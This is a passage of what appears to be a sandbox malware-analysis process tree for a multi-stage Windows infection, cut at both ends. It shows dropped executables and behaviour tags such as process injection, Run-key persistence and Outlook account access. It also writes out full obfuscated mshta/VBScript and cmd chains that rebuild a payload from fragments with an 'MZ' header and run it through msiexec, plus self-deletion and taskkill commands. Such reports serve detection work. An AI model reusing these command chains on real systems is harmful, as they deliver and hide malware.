C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT6⤵
- Executes dropped EXE
PID:5160 -
C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp" /SL5="$502EE,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe" ss18⤵
- Executes dropped EXE
PID:2524
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart8⤵
- Executes dropped EXE
PID:2876 -
C:\436dd42121a8482a2d6b8730\Setup.exeC:\436dd42121a8482a2d6b8730\\Setup.exe /q /norestart /x86 /x64 /web9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5232
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss18⤵
- Executes dropped EXE
- Checks computer location settings
PID:2568
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst2.exe"C:\Users\Admin\AppData\Local\Temp\inst2.exe"4⤵
- Executes dropped EXE
PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"4⤵
- Executes dropped EXE
PID:2072 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5244
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:1752 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:5372
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30007⤵
- Runs ping.exe
PID:4888
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"4⤵
- Executes dropped EXE
PID:2976
-
-
C:\Users\Admin\AppData\Local\Temp\customer7.exe"C:\Users\Admin\AppData\Local\Temp\customer7.exe"4⤵
- Executes dropped EXE
PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Executes dropped EXE
PID:5168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 6645⤵
- Program crash
PID:5404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 7085⤵
- Program crash
PID:5592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 6925⤵
- Program crash
PID:5656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 8565⤵
- Program crash
PID:5700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 9525⤵
- Program crash
PID:5760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 11885⤵
- Program crash
PID:5900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 11605⤵
- Program crash
PID:5936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 12045⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5960
-
-
-
C:\Users\Admin\AppData\Local\Temp\sfx.exe"C:\Users\Admin\AppData\Local\Temp\sfx.exe"4⤵
- Executes dropped EXE
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:5932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )6⤵PID:4688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ) do taskkill -f -iM "%~NxM"7⤵PID:3816
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi8⤵
- Executes dropped EXE
PID:4004 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:3680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:5756
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )9⤵PID:4568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC10⤵PID:5728
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"11⤵PID:5464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "11⤵PID:5604
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC11⤵
- Loads dropped DLL
PID:4676
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "LzmwAqmV.exe"8⤵
- Kills process with taskkill
PID:5572
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"4⤵
- Executes dropped EXE
PID:5300 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Loads dropped DLL
PID:5436
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5364
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe"C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe" & del C:\ProgramData\*.dll & exit3⤵PID:4132
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f4⤵
- Kills process with taskkill
PID:3236
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3272
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"3⤵
- Executes dropped EXE
PID:3436
-
-
-
C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp"C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /SL5="$40110,506127,422400,C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:740 -
C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe"C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3932
-
-
C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe"C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4836
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe"C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:1740
-
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
PID:1576
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe"C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe"2⤵
- Executes dropped EXE
PID:996
-
-
C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe"C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵PID:896
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
PID:1500
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:1288
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe"C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3824 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Adds Run key to start application
PID:6452 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
PID:6552 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffc0c1bdec0,0x7ffc0c1bded0,0x7ffc0c1bdee05⤵PID:6628
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1696 /prefetch:85⤵PID:6788
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:25⤵PID:6780
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1984 /prefetch:85⤵PID:6820
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2512 /prefetch:15⤵
- Checks computer location settings
PID:6948
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2572 /prefetch:15⤵
- Checks computer location settings
PID:6988
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2964 /prefetch:25⤵PID:5148
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1652 /prefetch:85⤵PID:6196
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3416 /prefetch:85⤵PID:6328
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2660 /prefetch:85⤵PID:3200
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3332 /prefetch:85⤵PID:6356
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3536 /prefetch:85⤵PID:5148
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2652 /prefetch:85⤵PID:6840
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe"C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3276 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:1612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5000
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3196 -
C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
PID:3240 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"4⤵PID:2284
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:3056
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"2⤵
- Executes dropped EXE
PID:4488 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:1196
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" ) do taskkill -im "%~NxK" -F4⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
PID:3932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:4476
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵PID:4104
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵PID:1808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵PID:3512
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵PID:2972
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
PID:1436
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Ul6PF7ORyqCzK3rFPRAWHREO.exe" -F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe"C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nyj61S0T9w.bat"3⤵PID:972
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵PID:3048
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:25⤵PID:3836
-
-
-
C:\Recovery\WindowsRE\ShellExperienceHost.exe"C:\Recovery\WindowsRE\ShellExperienceHost.exe"4⤵
- Executes dropped EXE
